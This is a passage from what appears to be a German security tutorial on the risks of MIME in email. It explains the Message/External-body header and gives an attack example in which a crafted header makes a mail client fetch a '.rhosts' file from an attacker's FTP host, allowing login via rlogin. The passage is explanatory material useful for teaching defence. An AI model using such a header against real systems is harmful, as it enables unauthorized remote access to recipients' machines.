Mit SMTP kann man nur Text versenden, der dem US-ACII-Zeichensatz entspricht.
Um diese Beschränkung zu umgehen wurde das MIME-Protokoll entwickelt. Dadurch
wurde es möglich, Bilder, Audiofiles oder Binärdaten per Mail zu versenden.
Durch diese Erweiterung entstehen verschiedene Sicherheitsbedrohungen:
Content-Type: Message/External-body; name="rfc1480.txt"; site="ds.internic.net"; access-type="anon-ftp"; directory="rfc" Content-Type: text/plain\\Durch die erste Zeile wird dem Mailer mitgeteilt, daß hier Daten eingebunden werden sollen, die nicht in dieser Mail mitgesendet wurden. Die restlichen Parameter beschreiben, wie der Mailer die externen Daten beschaffen soll. Hier soll also das File rfc1480.txt vom Server ds.internic.net per Anonymous-FTP aus dem Directory rfc heruntergeladen werden. Ein MIME-fähiger Mailer wird den RFC 1480 beschaffen und im aktuellen Verzeichnis abspeichern. Ein Hacker könnte diesen Mechanismus z.B wie folgt mißbrauchen:
Content-Type: Message/External-body; name=".rhosts"; site="ftp.visigoth.org"; access-type="anon-ftp"; directory="." Content-Type: text/plainHier würde ein MIME-fähiger Mailer eine .rhosts-Datei, die von einem Angreifer erstellt worden ist, herunterladen und im aktuellen Verzeichnis abspeichern. Hat der Hacker Glück und das aktuelle Directory ist das Homeverzeichnis des Empfängers, so kann er mit Hilfe des ,,rlogin``-Befehls sich auf der Maschine des Empfängers einloggen.
Eine weitere Gefahr durch MIME ist die Möglichkeit, ausführbaren Code, Postscript-Dateien oder andere Dateien (jpg,gif,Tex-Files) zu versenden. Solche Dateien könnten Viren enthalten oder sonstige gefährliche Aktivitäten durchführen. Siehe dazu auch Abschnitt 2.3 und Abschnitt 2.7.3.